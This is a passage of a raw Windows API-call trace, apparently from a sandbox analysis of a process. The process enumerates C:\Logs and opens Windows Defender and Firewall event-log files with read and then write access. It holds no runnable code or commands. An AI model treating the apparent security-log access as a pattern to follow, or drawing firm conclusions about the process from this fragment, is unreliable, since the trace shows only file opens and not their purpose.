out: hHeap=0x20000) returned 1 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.593] AreFileApisANSI () returned 1 [0087.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0087.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e030 [0087.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=61 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 61 [0087.593] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0087.593] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.593] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.593] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx", cAlternateFileName="MIF226~1.EVT")) returned 1 [0087.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0087.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0087.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0087.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0087.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.694] AreFileApisANSI () returned 1 [0087.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx", lpUsedDefaultChar=0x0) returned 53 [0087.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0087.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0087.700] AreFileApisANSI () returned 1 [0087.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0087.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 53 [0087.700] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.700] GetFileType (hFile=0x424) returned 0x1 [0087.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.700] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.700] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.701] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.701] CloseHandle (hObject=0x424) returned 1 [0087.701] AreFileApisANSI () returned 1 [0087.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0087.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 53 [0087.701] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.701] GetFileType (hFile=0x424) returned 0x1 [0087.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0087.701] CloseHandle (hObject=0x424) returned 1 [0087.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.702] AreFileApisANSI () returned 1 [0087.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0087.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 53 [0087.702] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0087.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.702] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cAlternateFileName="MIDCC7~1.EVT")) returned 1 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c5a8 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x55f20 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0087.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0087.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0087.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0087.704] AreFileApisANSI () returned 1 [0087.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpUsedDefaultChar=0x0) returned 91 [0087.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0087.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.704] AreFileApisANSI () returned 1 [0087.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0087.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0087.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 91 [0087.704] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.704] GetFileType (hFile=0x424) returned 0x1 [0087.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0087.705] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.705] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.705] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.705] CloseHandle (hObject=0x424) returned 1 [0087.705] AreFileApisANSI () returned 1 [0087.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0087.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0087.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 91 [0087.705] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.706] GetFileType (hFile=0x424) returned 0x1 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0087.706] CloseHandle (hObject=0x424) returned 1 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x811e8 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81410 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81a88 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x819d0 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81358 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, 